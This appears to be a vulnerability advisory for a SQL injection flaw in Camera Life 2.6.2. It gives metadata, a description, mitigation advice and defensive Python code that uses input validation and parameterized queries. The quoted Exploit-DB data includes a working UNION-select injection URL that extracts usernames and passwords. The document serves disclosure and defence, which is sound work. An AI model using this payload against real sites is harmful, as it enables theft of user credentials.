Vendor: Camera Life
By: nuclear
CVSS: 8.8 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Camera Life
Affected Version From: 2.6.2
Affected Version To: 2.6.2
Patch Exists: YES
Related CWE: N/A
CPE: a:fdcl:cameralife:2.6.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Camera Life 2.6.2 (id) SQL Injection Vulnerability

Camera Life 2.6.2 is vulnerable to a SQL injection attack. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Validate and filter all user-supplied input before it is used in SQL statements. Additionally, use parameterized queries so that input is passed to the database as data and is never interpreted as SQL.
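The two controls named above, applied to a numeric id parameter like the one in this advisory. This is an added example, not Camera Life's code: Python with an in-memory SQLite database stands in for the PHP application, and the photos table, the function names and the sample rows are hypothetical.

```python
import sqlite3

# Value of the `id` parameter quoted in the advisory, used only as test input.
ADVISORY_ID = "999999 union select concat(username,0x3a,password),null from users --"


def build_demo_db():
    """Constructed in-memory schema; `photos` is a hypothetical table name."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE photos (id INTEGER PRIMARY KEY, filename TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO photos VALUES (1, 'beach.jpg'), (2, 'city.jpg');
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return db


def parse_photo_id(raw):
    """Allow-list validation: 1 to 10 ASCII digits and nothing else."""
    if not (isinstance(raw, str) and raw.isascii() and raw.isdigit()
            and len(raw) <= 10):
        raise ValueError("id must be a non-negative integer")
    return int(raw)


def photo_rows_bound(db, photo_id):
    """Parameterized query: the value is bound as data, never parsed as SQL."""
    return db.execute(
        "SELECT id, filename FROM photos WHERE id = ?", (photo_id,)
    ).fetchall()


def photo_rows(db, raw_id):
    """Both controls from the mitigation: validate first, then bind."""
    try:
        photo_id = parse_photo_id(raw_id)
    except ValueError:
        return []  # a real handler would answer with HTTP 400 here
    return photo_rows_bound(db, photo_id)


if __name__ == "__main__":
    db = build_demo_db()
    print(photo_rows(db, "1"))                 # valid id
    print(photo_rows(db, ADVISORY_ID))         # rejected by validation
    print(photo_rows_bound(db, ADVISORY_ID))   # binding alone: no SQL executed
```

Validation rejects the request before any query runs; binding is the control that still holds if a validation rule is ever loosened or missed.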

Exploit-DB raw data:

#Camera Life 2.6.2(id) Sql Injection Vulnerability

#Author: nuclear

#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip

#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --

#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P

# milw0rm.com [2008-07-25]